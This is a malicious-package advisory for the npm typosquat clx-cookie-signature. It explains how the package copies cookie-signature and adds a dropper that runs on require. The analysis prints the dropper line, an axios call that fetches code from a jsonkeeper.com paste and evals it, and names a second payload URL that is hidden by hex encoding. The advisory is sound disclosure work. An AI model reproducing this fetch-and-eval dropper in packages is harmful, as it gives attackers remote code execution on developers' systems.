mal-2026-6141
Vulnerability from ossf_malicious_packages
Published
2026-06-18 22:28
Modified
2026-06-18 22:28
Summary
Malicious code in clx-cookie-signature (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3)

Package impersonates the popular cookie-signature library (copying its README, author field 'TJ Holowaychuk tj@learnboost.com', and sign/unsign API), but index.js adds a top-level dropper that fires the moment the module is required. Specifically, index.js line 16 issues require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); }), eval'ing whatever JSON the author currently hosts at that URL. A helper g() (index.js lines 18-24) decodes hex-encoded strings to reconstruct the tokens 'axios', 'get', 'then' and a second payload URL https://www.jsonkeeper.com/b/HY6M6, providing an obfuscated fallback dropper. Because jsonkeeper.com is a mutable, author-controlled paste host, the author can change the executed code at any time without republishing the package. Any project that installs and require()s clx-cookie-signature — likely as a mistyped substitute for cookie-signature — runs arbitrary attacker code in the consuming process.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits
Amazon Inspector inspector-research@amazon.com
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "index.js",
              "sha256": "9eb97dcae23527bc66606235e0ad5d2c89692d311120dec3a636acf479e53047",
              "tlsh": "663155137ea5d01712b121b3b1f3cc47fd6695601b9a46e0bb6454943ded6b28f30ed8"
            },
            {
              "path": "package.json",
              "sha256": "e82be7eb22a7cdb806c21d601fdbcf7199f908945bb118c22d86c7d031b6c12d",
              "tlsh": "02f04c1795685d7706fc5395f8640247b6125f1f00b48c0f36ba522c576745707a8f7a"
            }
          ],
          "package_integrity": [
            {
              "filename": "clx-cookie-signature-1.2.1.tgz",
              "hashes": {
                "sha1": "16a98bcda5b9b2178845a07df756ec788cdfed6e",
                "sha512_sri": "sha512-spfhApPggc7s8hRJAXMlnJGLYJQ3iqqCUpvmTu/dkos6z3hRvV1x3DUQaFq3TAPkq1kpmDQF5BOga2ILgEG7vg=="
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "clx-cookie-signature"
      },
      "versions": [
        "1.2.1"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-007036",
        "import_time": "2026-06-18T23:09:38.765876167Z",
        "modified_time": "2026-06-18T22:28:34Z",
        "sha256": "9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3",
        "source": "amazon-inspector",
        "versions": [
          "1.2.1"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3)\nPackage impersonates the popular cookie-signature library (copying its README, author field \u0027TJ Holowaychuk \u003ctj@learnboost.com\u003e\u0027, and sign/unsign API), but index.js adds a top-level dropper that fires the moment the module is required. Specifically, index.js line 16 issues `require(\u0027axios\u0027).get(\u0027https://www.jsonkeeper.com/b/MYUKZ\u0027).then(r =\u003e { eval(r.data.content_o); })`, eval\u0027ing whatever JSON the author currently hosts at that URL. A helper `g()` (index.js lines 18-24) decodes hex-encoded strings to reconstruct the tokens \u0027axios\u0027, \u0027get\u0027, \u0027then\u0027 and a second payload URL https://www.jsonkeeper.com/b/HY6M6, providing an obfuscated fallback dropper. Because jsonkeeper.com is a mutable, author-controlled paste host, the author can change the executed code at any time without republishing the package. Any project that installs and require()s clx-cookie-signature \u2014 likely as a mistyped substitute for cookie-signature \u2014 runs arbitrary attacker code in the consuming process.\n",
  "id": "MAL-2026-6141",
  "modified": "2026-06-18T22:28:34Z",
  "published": "2026-06-18T22:28:34Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/clx-cookie-signature/v/1.2.1"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in clx-cookie-signature (npm)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.